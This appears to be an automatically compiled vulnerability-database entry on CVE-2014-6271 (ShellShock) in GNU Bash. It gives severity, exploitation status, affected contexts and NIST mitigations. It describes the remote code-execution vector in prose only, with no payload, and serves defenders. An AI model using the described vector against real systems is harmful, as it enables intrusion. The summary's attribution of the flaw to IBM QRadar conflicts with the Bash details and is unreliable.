CVE-2014-6271
Published: 24 September 2014
Summary
CVE-2014-6271 is a critical-severity OS Command Injection (CWE-78) vulnerability in Ibm Qradar Security Information And Event Manager. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 0.0% of CVEs by exploit likelihood; CISA has added it to the Known Exploited Vulnerabilities catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-2 (Flaw Remediation) and AC-6 (Least Privilege).
Deeper analysis
GNU Bash through 4.3 contains a flaw that causes it to process trailing strings after function definitions within environment variable values. This affects the Bash shell itself and surfaces in any context where Bash is invoked across a privilege boundary, including OpenSSH's ForceCommand feature, Apache HTTP Server mod_cgi and mod_cgid modules, certain DHCP client scripts, and similar configurations.
Remote attackers can supply a crafted environment variable to execute arbitrary code without authentication or user interaction. Successful exploitation grants complete control over the affected process, enabling full read, write, and execute access as indicated by the CVSS 9.8 rating and CWE-78 classification.
The initial remediation for this issue proved incomplete, resulting in the assignment of CVE-2014-7169 for the residual vulnerability. Vendor advisories such as those from Mageia, Juniper, JVN, and related sources document the necessary updates and configuration changes.
OWASP Top 10 for Web (2025)
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2014-6157
Vulnerability details
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the…
more
mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock." NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
- CWE(s)
- KEV Date Added
- 28 January 2022
Related Threats
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly requires timely installation of vendor patches that correct the Bash function-definition parsing flaw enabling unauthenticated remote code execution.
Limits privileges of processes (sshd ForceCommand, Apache CGI, DHCP clients) that receive attacker-supplied environment variables, reducing impact of successful exploitation.
Deploys malicious-code detection mechanisms that can block or alert on the arbitrary commands injected through crafted Bash environment variables.